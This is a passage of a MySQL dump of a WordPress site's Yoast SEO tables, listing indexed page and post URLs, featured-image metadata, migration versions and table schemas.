Tips','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://www.dailyjolly.co.uk/wp-content/uploads/2017/10/backgroundpaper1416.jpg',NULL,'122','featured-image',NULL,NULL,'https://www.dailyjolly.co.uk/wp-content/uploads/2017/10/backgroundpaper1416.jpg','122','featured-image','{\"width\":1600,\"height\":1200,\"url\":\"https://www.dailyjolly.co.uk/wp-content/uploads/2017/10/backgroundpaper1416.jpg\",\"path\":\"/home/dailyjolly.co.uk/public_html/wp-content/uploads/2017/10/backgroundpaper1416.jpg\",\"size\":\"full\",\"id\":122,\"alt\":\"\",\"pixels\":1920000,\"type\":\"image/jpeg\"}',NULL,NULL,NULL,'2022-04-13 17:55:58','2022-04-13 17:55:58',1,NULL,NULL,NULL,NULL,0,NULL,2,'2017-10-17 08:58:00','2017-10-17 08:30:44'),(38,'https://www.dailyjolly.co.uk/blog/what-are-foam-boosters-and-why-dont-we-recommend-them','87:4269cf1b72169af3612604d0830ef88b',39,'post','post',1,0,NULL,NULL,'What are foam boosters and why don&#8217;t we recommend them?','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://www.dailyjolly.co.uk/wp-content/uploads/2017/10/coral_and_reef_fish_2739.jpg',NULL,'135','featured-image',NULL,NULL,'https://www.dailyjolly.co.uk/wp-content/uploads/2017/10/coral_and_reef_fish_2739.jpg','135','featured-image','{\"width\":2500,\"height\":1875,\"url\":\"https://www.dailyjolly.co.uk/wp-content/uploads/2017/10/coral_and_reef_fish_2739.jpg\",\"path\":\"/home/dailyjolly.co.uk/public_html/wp-content/uploads/2017/10/coral_and_reef_fish_2739.jpg\",\"size\":\"full\",\"id\":135,\"alt\":\"\",\"pixels\":4687500,\"type\":\"image/jpeg\"}',NULL,NULL,NULL,'2022-04-13 17:56:03','2022-04-13 17:56:03',1,NULL,NULL,NULL,NULL,0,NULL,2,'2017-10-17 08:43:16','2017-10-17 08:30:53'),(39,'https://www.dailyjolly.co.uk/blog/what-does-it-mean-to-go-to-rehab','66:ccad24b782f8d750c368441504636dd2',213,'post','post',1,0,NULL,NULL,'What does it mean to go to rehab?','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://www.dailyjolly.co.uk/wp-content/uploads/2021/08/Rehabilitation.jpg',NULL,'214','featured-image',NULL,NULL,'https://www.dailyjolly.co.uk/wp-content/uploads/2021/08/Rehabilitation.jpg','214','featured-image','{\"width\":1920,\"height\":1373,\"url\":\"https://www.dailyjolly.co.uk/wp-content/uploads/2021/08/Rehabilitation.jpg\",\"path\":\"/home/dailyjolly.co.uk/public_html/wp-content/uploads/2021/08/Rehabilitation.jpg\",\"size\":\"full\",\"id\":214,\"alt\":\"\",\"pixels\":2636160,\"type\":\"image/jpeg\"}',NULL,NULL,NULL,'2022-04-13 17:56:07','2022-04-13 17:56:07',1,NULL,NULL,NULL,NULL,0,NULL,2,'2021-08-24 11:56:19','2021-08-20 08:39:06'),(40,'https://www.dailyjolly.co.uk/blog/what-you-need-to-know-about-the-blue-mile','75:25089dab3c4ffb5c1c147800f68edfaa',31,'post','post',1,0,NULL,NULL,'What you need to know about the Blue Mile','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://www.dailyjolly.co.uk/wp-content/uploads/2017/10/12_apostles_coast-1.jpg',NULL,'110','featured-image',NULL,NULL,'https://www.dailyjolly.co.uk/wp-content/uploads/2017/10/12_apostles_coast-1.jpg','110','featured-image','{\"width\":3500,\"height\":2329,\"url\":\"https://www.dailyjolly.co.uk/wp-content/uploads/2017/10/12_apostles_coast-1.jpg\",\"path\":\"/home/dailyjolly.co.uk/public_html/wp-content/uploads/2017/10/12_apostles_coast-1.jpg\",\"size\":\"full\",\"id\":110,\"alt\":\"\",\"pixels\":8151500,\"type\":\"image/jpeg\"}',NULL,NULL,NULL,'2022-04-13 17:56:11','2022-04-13 17:56:11',1,NULL,NULL,NULL,NULL,0,NULL,2,'2017-10-17 08:35:14','2017-10-17 08:31:50'),(41,'https://www.dailyjolly.co.uk/buy-to-let-properties-up-by-half','61:0252a78a6fdc4a8b4f79fe70e6e3c5be',178,'post','page',1,0,NULL,NULL,'Buy-to-let properties up by half','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'http://www.dailyjolly.co.uk/wp-content/uploads/2017/11/keys.jpg',NULL,NULL,'first-content-image',NULL,NULL,'http://www.dailyjolly.co.uk/wp-content/uploads/2017/11/keys.jpg',NULL,'first-content-image',NULL,NULL,NULL,NULL,'2022-04-13 17:56:15','2022-04-13 17:56:15',1,NULL,NULL,NULL,NULL,0,NULL,2,'2017-11-10 12:19:11','2017-11-10 12:18:16'),(42,'https://www.dailyjolly.co.uk/can-you-find-it-business-links','59:d0cd5b94e4ad36b4aa9b89d849b04bc6',24,'post','page',1,0,NULL,NULL,'Can you Find it &#8211; Business Links!','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://www.dailyjolly.co.uk/wp-content/uploads/2017/10/building00033p.jpg',NULL,'131','featured-image',NULL,NULL,'https://www.dailyjolly.co.uk/wp-content/uploads/2017/10/building00033p.jpg','131','featured-image','{\"width\":2048,\"height\":1281,\"url\":\"https://www.dailyjolly.co.uk/wp-content/uploads/2017/10/building00033p.jpg\",\"path\":\"/home/dailyjolly.co.uk/public_html/wp-content/uploads/2017/10/building00033p.jpg\",\"size\":\"full\",\"id\":131,\"alt\":\"\",\"pixels\":2623488,\"type\":\"image/jpeg\"}',NULL,NULL,NULL,'2022-04-13 17:56:20','2022-04-13 17:56:20',1,NULL,NULL,NULL,NULL,0,NULL,2,'2017-10-17 09:08:05','2017-10-06 08:45:04'),(43,'https://www.dailyjolly.co.uk/summer-makeup-tips-to-keep-you-glowing-with-minimal-makeup','87:0c7af5b029afb9a13137fe707c78089d',164,'post','page',1,0,NULL,NULL,'Summer makeup tips to keep you glowing with minimal makeup!','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'http://www.dailyjolly.co.uk/wp-content/uploads/2017/10/summer-makeup.jpg',NULL,NULL,'first-content-image',NULL,NULL,'http://www.dailyjolly.co.uk/wp-content/uploads/2017/10/summer-makeup.jpg',NULL,'first-content-image',NULL,NULL,NULL,NULL,'2022-04-13 17:56:36','2022-04-13 17:56:36',1,NULL,NULL,NULL,NULL,0,NULL,2,'2018-03-06 14:04:39','2017-10-25 15:14:09'),(44,'https://www.dailyjolly.co.uk/the-power-of-freeing-your-mind','59:f61a2b42cec1a913c81b97baeb4e1395',193,'post','page',1,0,NULL,NULL,'The Power of Freeing Your Mind','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://www.dailyjolly.co.uk/wp-content/uploads/2018/10/team-spirit-2447163_960_720.jpg',NULL,'195','featured-image',NULL,NULL,'https://www.dailyjolly.co.uk/wp-content/uploads/2018/10/team-spirit-2447163_960_720.jpg','195','featured-image','{\"width\":889,\"height\":720,\"url\":\"https://www.dailyjolly.co.uk/wp-content/uploads/2018/10/team-spirit-2447163_960_720.jpg\",\"path\":\"/home/dailyjolly.co.uk/public_html/wp-content/uploads/2018/10/team-spirit-2447163_960_720.jpg\",\"size\":\"full\",\"id\":195,\"alt\":\"\",\"pixels\":640080,\"type\":\"image/jpeg\"}',NULL,NULL,NULL,'2022-04-13 17:56:41','2022-04-13 17:56:41',1,NULL,NULL,NULL,NULL,0,NULL,2,'2018-10-19 10:57:53','2018-10-19 10:57:53'),(45,'https://www.dailyjolly.co.uk/blog/tag/addiction','47:ab7903ce8ecbfd4feac3f0bd6e466feb',6,'term','post_tag',NULL,NULL,NULL,NULL,'addiction',NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2022-04-14 05:54:40','2022-04-14 05:54:40',1,NULL,NULL,NULL,NULL,0,NULL,2,'2021-08-24 11:56:19','2021-08-20 08:39:06'),(46,'https://www.dailyjolly.co.uk/blog/tag/rehab','43:bf8e0a383b0c2755bb503cde6c99480b',7,'term','post_tag',NULL,NULL,NULL,NULL,'rehab',NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2022-04-14 05:54:45','2022-04-14 05:54:45',1,NULL,NULL,NULL,NULL,0,NULL,2,'2021-08-24 11:56:19','2021-08-20 08:39:06'),(47,'https://www.dailyjolly.co.uk/blog/tag/rehab-centre','50:0b8e0ac976888aa610b12a7d9f39f230',4,'term','post_tag',NULL,NULL,NULL,NULL,'rehab centre',NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2022-04-14 05:54:53','2022-04-14 05:54:53',1,NULL,NULL,NULL,NULL,0,NULL,2,'2021-08-24 11:56:19','2021-08-20 08:39:06'),(48,'https://www.dailyjolly.co.uk/blog/tag/rehab-centres','51:484c09ac818213f08d349456263f9056',5,'term','post_tag',NULL,NULL,NULL,NULL,'rehab centres',NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2022-04-14 05:54:59','2022-04-14 05:54:59',1,NULL,NULL,NULL,NULL,0,NULL,2,'2021-08-24 11:56:19','2021-08-20 08:39:06'),(49,'https://www.dailyjolly.co.uk/blog/wateraid-transforming-lives','61:0c562900083a752f6e02fcd4514ea7f8',59,'post','post',1,0,NULL,NULL,'WaterAid Transforming Lives','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://www.dailyjolly.co.uk/wp-content/uploads/2017/10/backgroundpaper0650.jpg',NULL,'120','featured-image',NULL,NULL,'https://www.dailyjolly.co.uk/wp-content/uploads/2017/10/backgroundpaper0650.jpg','120','featured-image','{\"width\":1600,\"height\":1200,\"url\":\"https://www.dailyjolly.co.uk/wp-content/uploads/2017/10/backgroundpaper0650.jpg\",\"path\":\"/home/dailyjolly.co.uk/public_html/wp-content/uploads/2017/10/backgroundpaper0650.jpg\",\"size\":\"full\",\"id\":120,\"alt\":\"\",\"pixels\":1920000,\"type\":\"image/jpeg\"}',NULL,NULL,NULL,'2022-04-14 05:55:01','2022-04-14 05:55:01',1,NULL,NULL,NULL,NULL,0,NULL,2,'2017-10-17 08:30:43','2017-10-17 08:30:43'),(50,'https://www.dailyjolly.co.uk/blog/wear-and-care-for-your-wardrobe','65:4737a3f89829ab51d920e609f7a9b690',60,'post','post',1,0,NULL,NULL,'Wear and Care for your wardrobe','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://www.dailyjolly.co.uk/wp-content/uploads/2017/10/12_apostles_coast-1.jpg',NULL,'110','featured-image',NULL,NULL,'https://www.dailyjolly.co.uk/wp-content/uploads/2017/10/12_apostles_coast-1.jpg','110','featured-image','{\"width\":3500,\"height\":2329,\"url\":\"https://www.dailyjolly.co.uk/wp-content/uploads/2017/10/12_apostles_coast-1.jpg\",\"path\":\"/home/dailyjolly.co.uk/public_html/wp-content/uploads/2017/10/12_apostles_coast-1.jpg\",\"size\":\"full\",\"id\":110,\"alt\":\"\",\"pixels\":8151500,\"type\":\"image/jpeg\"}',NULL,NULL,NULL,'2022-04-14 05:55:08','2022-04-14 05:55:08',1,NULL,NULL,NULL,NULL,0,NULL,2,'2017-10-17 08:30:43','2017-10-17 08:30:43'),(51,'https://www.dailyjolly.co.uk/index-html','39:ed18ea8f00ff29606a29771bfa2de0a3',14,'post','page',1,0,NULL,NULL,'Home','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://www.dailyjolly.co.uk/wp-content/uploads/2017/10/backgroundpaper1449.jpg',NULL,'124','featured-image',NULL,NULL,'https://www.dailyjolly.co.uk/wp-content/uploads/2017/10/backgroundpaper1449.jpg','124','featured-image','{\"width\":1600,\"height\":1200,\"url\":\"https://www.dailyjolly.co.uk/wp-content/uploads/2017/10/backgroundpaper1449.jpg\",\"path\":\"/home/dailyjolly.co.uk/public_html/wp-content/uploads/2017/10/backgroundpaper1449.jpg\",\"size\":\"full\",\"id\":124,\"alt\":\"\",\"pixels\":1920000,\"type\":\"image/jpeg\"}',NULL,NULL,NULL,'2022-04-22 15:00:13','2022-04-22 15:00:13',1,NULL,NULL,NULL,NULL,0,NULL,2,'2017-08-22 07:54:43','2017-08-22 07:54:35'),(52,'https://www.dailyjolly.co.uk/personal-servicesindex-html','56:9d74aaa2d4cc063c35103784692db70a',6,'post','page',1,0,NULL,NULL,'Personal Services','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://www.dailyjolly.co.uk/wp-content/uploads/2017/10/building00029p.jpg',NULL,'129','featured-image',NULL,NULL,'https://www.dailyjolly.co.uk/wp-content/uploads/2017/10/building00029p.jpg','129','featured-image','{\"width\":2048,\"height\":1218,\"url\":\"https://www.dailyjolly.co.uk/wp-content/uploads/2017/10/building00029p.jpg\",\"path\":\"/home/dailyjolly.co.uk/public_html/wp-content/uploads/2017/10/building00029p.jpg\",\"size\":\"full\",\"id\":129,\"alt\":\"\",\"pixels\":2494464,\"type\":\"image/jpeg\"}',NULL,NULL,NULL,'2022-04-22 15:08:57','2022-04-22 15:08:57',1,NULL,NULL,NULL,NULL,0,NULL,2,'2017-08-22 07:55:26','2017-08-22 07:53:49'),(53,'https://www.dailyjolly.co.uk/adult-web-camslesbian-webcams-htm','62:d6f4e427aa6c17e7d99a3c97d886d526',12,'post','page',1,0,NULL,NULL,'Adult Web Cams','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://www.dailyjolly.co.uk/wp-content/uploads/2017/10/building00030p.jpg',NULL,'130','featured-image',NULL,NULL,'https://www.dailyjolly.co.uk/wp-content/uploads/2017/10/building00030p.jpg','130','featured-image','{\"width\":1256,\"height\":630,\"url\":\"https://www.dailyjolly.co.uk/wp-content/uploads/2017/10/building00030p.jpg\",\"path\":\"/home/dailyjolly.co.uk/public_html/wp-content/uploads/2017/10/building00030p.jpg\",\"size\":\"full\",\"id\":130,\"alt\":\"\",\"pixels\":791280,\"type\":\"image/jpeg\"}',NULL,NULL,NULL,'2022-04-22 15:12:49','2022-04-22 15:12:49',1,NULL,NULL,NULL,NULL,0,NULL,2,'2017-08-22 07:55:02','2017-08-22 07:54:27'),(54,'https://www.dailyjolly.co.uk/mature-phone-sex-htm','49:4fc24f7a95cb90134c42632252f2fd70',10,'post','page',1,0,NULL,NULL,'Phone Conversations','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://www.dailyjolly.co.uk/wp-content/uploads/2017/10/building00033p.jpg',NULL,'131','featured-image',NULL,NULL,'https://www.dailyjolly.co.uk/wp-content/uploads/2017/10/building00033p.jpg','131','featured-image','{\"width\":2048,\"height\":1281,\"url\":\"https://www.dailyjolly.co.uk/wp-content/uploads/2017/10/building00033p.jpg\",\"path\":\"/home/dailyjolly.co.uk/public_html/wp-content/uploads/2017/10/building00033p.jpg\",\"size\":\"full\",\"id\":131,\"alt\":\"\",\"pixels\":2623488,\"type\":\"image/jpeg\"}',NULL,NULL,NULL,'2022-04-24 05:35:28','2022-04-24 05:35:28',1,NULL,NULL,NULL,NULL,0,NULL,2,'2017-08-22 07:55:17','2017-08-22 07:54:14'),(55,'https://www.dailyjolly.co.uk/adult-web-camsmature-web-cams-htm','62:23a43e7ceb665400e9733d665d1fb9e7',8,'post','page',1,0,NULL,NULL,'Mature Web Cams','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://www.dailyjolly.co.uk/wp-content/uploads/2017/10/backgroundpaper1419.jpg',NULL,'123','featured-image',NULL,NULL,'https://www.dailyjolly.co.uk/wp-content/uploads/2017/10/backgroundpaper1419.jpg','123','featured-image','{\"width\":1600,\"height\":1200,\"url\":\"https://www.dailyjolly.co.uk/wp-content/uploads/2017/10/backgroundpaper1419.jpg\",\"path\":\"/home/dailyjolly.co.uk/public_html/wp-content/uploads/2017/10/backgroundpaper1419.jpg\",\"size\":\"full\",\"id\":123,\"alt\":\"\",\"pixels\":1920000,\"type\":\"image/jpeg\"}',NULL,NULL,NULL,'2022-04-29 19:02:59','2022-04-29 19:02:59',1,NULL,NULL,NULL,NULL,0,NULL,2,'2017-08-22 07:55:09','2017-08-22 07:54:01');
/*!40000 ALTER TABLE `wp_yoast_indexable` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_yoast_indexable_hierarchy`
--

DROP TABLE IF EXISTS `wp_yoast_indexable_hierarchy`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_yoast_indexable_hierarchy` (
  `indexable_id` int(11) unsigned NOT NULL,
  `ancestor_id` int(11) unsigned NOT NULL,
  `depth` int(11) unsigned DEFAULT NULL,
  `blog_id` bigint(20) NOT NULL DEFAULT 1,
  PRIMARY KEY (`indexable_id`,`ancestor_id`),
  KEY `indexable_id` (`indexable_id`),
  KEY `ancestor_id` (`ancestor_id`),
  KEY `depth` (`depth`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_yoast_indexable_hierarchy`
--

LOCK TABLES `wp_yoast_indexable_hierarchy` WRITE;
/*!40000 ALTER TABLE `wp_yoast_indexable_hierarchy` DISABLE KEYS */;
INSERT INTO `wp_yoast_indexable_hierarchy` VALUES (1,0,0,1),(2,0,0,1),(3,0,0,1),(4,0,0,1),(5,0,0,1),(6,0,0,1),(7,0,0,1),(9,0,0,1),(10,0,0,1),(11,0,0,1),(12,0,0,1),(13,0,0,1),(14,0,0,1),(15,0,0,1),(16,0,0,1),(17,0,0,1),(18,0,0,1),(19,0,0,1),(20,0,0,1),(21,0,0,1),(22,0,0,1),(23,0,0,1),(24,0,0,1),(25,0,0,1),(26,0,0,1),(27,0,0,1),(28,0,0,1),(29,0,0,1),(30,0,0,1),(31,0,0,1),(32,0,0,1),(33,0,0,1),(34,0,0,1),(35,0,0,1),(36,0,0,1),(37,0,0,1),(38,0,0,1),(39,0,0,1),(40,0,0,1),(41,0,0,1),(42,0,0,1),(43,0,0,1),(44,0,0,1),(45,0,0,1),(46,0,0,1),(47,0,0,1),(48,0,0,1),(49,0,0,1),(50,0,0,1),(51,0,0,1),(52,0,0,1),(53,0,0,1),(54,0,0,1),(55,0,0,1);
/*!40000 ALTER TABLE `wp_yoast_indexable_hierarchy` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_yoast_migrations`
--

DROP TABLE IF EXISTS `wp_yoast_migrations`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_yoast_migrations` (
  `id` int(11) unsigned NOT NULL AUTO_INCREMENT,
  `version` varchar(191) DEFAULT NULL,
  PRIMARY KEY (`id`),
  UNIQUE KEY `wp_yoast_migrations_version` (`version`)
) ENGINE=InnoDB AUTO_INCREMENT=24 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_yoast_migrations`
--

LOCK TABLES `wp_yoast_migrations` WRITE;
/*!40000 ALTER TABLE `wp_yoast_migrations` DISABLE KEYS */;
INSERT INTO `wp_yoast_migrations` VALUES (1,'20171228151840'),(2,'20171228151841'),(3,'20190529075038'),(4,'20191011111109'),(5,'20200408101900'),(6,'20200420073606'),(7,'20200428123747'),(8,'20200428194858'),(9,'20200429105310'),(10,'20200430075614'),(11,'20200430150130'),(12,'20200507054848'),(13,'20200513133401'),(14,'20200609154515'),(15,'20200616130143'),(16,'20200617122511'),(17,'20200702141921'),(18,'20200728095334'),(19,'20201202144329'),(20,'20201216124002'),(21,'20201216141134'),(22,'20210817092415'),(23,'20211020091404');
/*!40000 ALTER TABLE `wp_yoast_migrations` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_yoast_primary_term`
--

DROP TABLE IF EXISTS `wp_yoast_primary_term`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_yoast_primary_term` (
  `id` int(11) unsigned NOT NULL AUTO_INCREMENT,
  `post_id` bigint(20) DEFAULT NULL,
  `term_id` bigint(20) DEFAULT NULL,
  `taxonomy` varchar(32) NOT NULL,
  `created_at` datetime DEFAULT NULL,
  `updated_at` timestamp NOT NULL DEFAULT current_timestamp() ON UPDATE current_timestamp(),
  `blog_id` bigint(20) NOT NULL DEFAULT 1,
  PRIMARY KEY (`id`),
  KEY `post_taxonomy` (`post_id`,`taxonomy`),
  KEY `post_term` (`post_id`,`term_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_yoast_primary_term`
--

LOCK TABLES `wp_yoast_primary_term` WRITE;
/*!40000 ALTER TABLE `wp_yoast_primary_term` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_yoast_primary_term` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_yoast_seo_links`
--

DROP TABLE IF EXISTS `wp_yoast_seo_links`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_yoast_seo_links` (
  `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `url` varchar(255) DEFAULT NULL,
  `post_id` bigint(20) unsigned DEFAULT NULL,
  `target_post_id` bigint(20) unsigned DEFAULT NULL,
  `type` varchar(8) DEFAULT NULL,
  `indexable_id` int(11) unsigned DEFAULT NULL,
  `target_indexable_id` int(11) unsigned DEFAULT NULL,
  `height` int(11) unsigned DEFAULT NULL,
  `width` int(11) unsigned DEFAULT NULL,
  `size` int(11) unsigned DEFAULT NULL,
  `language` varchar(32) DEFAULT NULL,
  `region` varchar(32) DEFAULT NULL,
  PRIMARY KEY (`id`),
  KEY `link_direction` (`post_id`,`type`),
  KEY `indexable_link_direction` (`indexable_id`,`type`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_yoast_seo_links`
--

LOCK TABLES `wp_yoast_seo_links` WRITE;
/*!40000 ALTER TABLE `wp_yoast_seo_links` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_yoast_seo_links` ENABLE KEYS */;
UNLOCK TABLES;
/*!40103 SET TIME_ZONE=@OLD_TIME_ZONE */;

/*!40101 SET SQL_MODE=@OLD_SQL_MODE */;
/*!40014 SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS */;
/*!40014 SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS */;
/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;
/*!40111 SET SQL_NOTES=@OLD_SQL_NOTES */;

-- Dump completed on 2023-02-01  0:03:43